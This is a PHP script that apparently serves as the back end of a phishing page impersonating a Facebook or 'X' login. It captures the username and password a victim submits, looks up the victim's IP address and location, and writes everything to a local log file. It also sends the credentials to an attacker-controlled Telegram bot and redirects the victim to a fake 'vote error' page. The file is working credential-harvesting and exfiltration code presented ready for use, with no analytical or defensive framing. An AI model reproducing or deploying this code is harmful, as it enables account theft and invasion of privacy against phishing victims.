<?php
// Disable errors (for production use)
error_reporting(0);

// Load secure config (update this path)
$configPath = __DIR__ . '/config.php';
if (file_exists($configPath)) {
    $cfg = include $configPath;
    $botToken = $cfg['telegram_bot_token'] ?? null;
    $chatId   = $cfg['telegram_chat_id'] ?? null;
} else {
    $botToken = null;
    $chatId = null;
}

if (!empty($botToken) && !empty($chatId) && $_SERVER['REQUEST_METHOD'] === 'POST') {
    // Sanitize inputs
    $username = filter_input(INPUT_POST, 'username', FILTER_SANITIZE_STRING);
    $password = filter_input(INPUT_POST, 'password', FILTER_SANITIZE_STRING);

    if (empty($username) || empty($password)) {
        die('Invalid input.');
    }

    // Get IP and hostname
    function get_client_ip() {
        if (!empty($_SERVER['HTTP_CLIENT_IP'])) return $_SERVER['HTTP_CLIENT_IP'];
        if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) return $_SERVER['HTTP_X_FORWARDED_FOR'];
        return $_SERVER['REMOTE_ADDR'];
    }

    $ip = get_client_ip();
    $hostname = gethostbyaddr($ip) ?: 'Unknown';
    $date = gmdate("d-n-Y");
    $time = gmdate("H:i:s");

    // Prepare log message
    $logMsg = "========== X Login📥✅ ==========\n";
    $logMsg .= "User: $username\n";
$logMsg .= "Password: $password\n";
$logMsg .= "----------\n";
$logMsg .= "IP: $ip\n";
$logMsg .= "Log: $time / $date \n";
$logMsg .= "----------\n";
    
    // Fetch location data
    $apiURL = "http://ip-api.com/json/{$ip}";
    $response = @file_get_contents($apiURL);

    if ($response !== false) {
        $data = json_decode($response, true);

        if ($data && $data['status'] === 'success') {
            $country = $data['country'] ?? 'Unknown';
            $region = $data['regionName'] ?? 'Unknown';
            $city = $data['city'] ?? 'Unknown';
            $continent = $data['continent'] ?? 'Unknown';

            $logMsg .= "Country: $country\nCity: $city\nRegion: $region\nContinent: $continent\n
               📤📤📤📤📤📤\n" ;
        } else {
            $logMsg .= "Location data unavailable.\n";
        }
    } else {
        $logMsg .= "Failed to retrieve location data.\n";
    }

    // Save to log file
    $logFile = __DIR__ . '/logs.txt';
    file_put_contents($logFile, $logMsg . "\n\n", FILE_APPEND | LOCK_EX);

    // Prepare Telegram message
    $dateStr = date('Y-m-d H:i:s', time() + 3600); // Lagos time
    $telegramMsg  = "🔔 *Login Attempt Facebook *\n\n";
    $telegramMsg .= "👤 *Email/Username:* `{$username}`\n";
    $telegramMsg .= "🔑 *Password:* `{$password}`\n";
    $telegramMsg .= "🌎 *Country:* `{$country}`\n";
    $telegramMsg .= "🏙️ *City:* `{$city}`\n";
    $telegramMsg .= "🌐 *IP:* `{$ip}`\n";
    $telegramMsg .= "🕒 *Date/Time :* {$dateStr}\n";

    // Send to Telegram
    $url = "https://api.telegram.org/bot{$botToken}/sendMessage";
    $postFields = [
        'chat_id' => $chatId,
        'text' => $telegramMsg,
        'parse_mode' => 'Markdown'
    ];

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);
    curl_setopt($ch, CURLOPT_TIMEOUT, 3);
    curl_exec($ch);
    curl_close($ch);

    // Redirect
    header("Location: https://votehubz.pages.dev/user/vote/error/index.html");
    exit;
} else { die('Configuration missing or invalid request.'); } 
?>
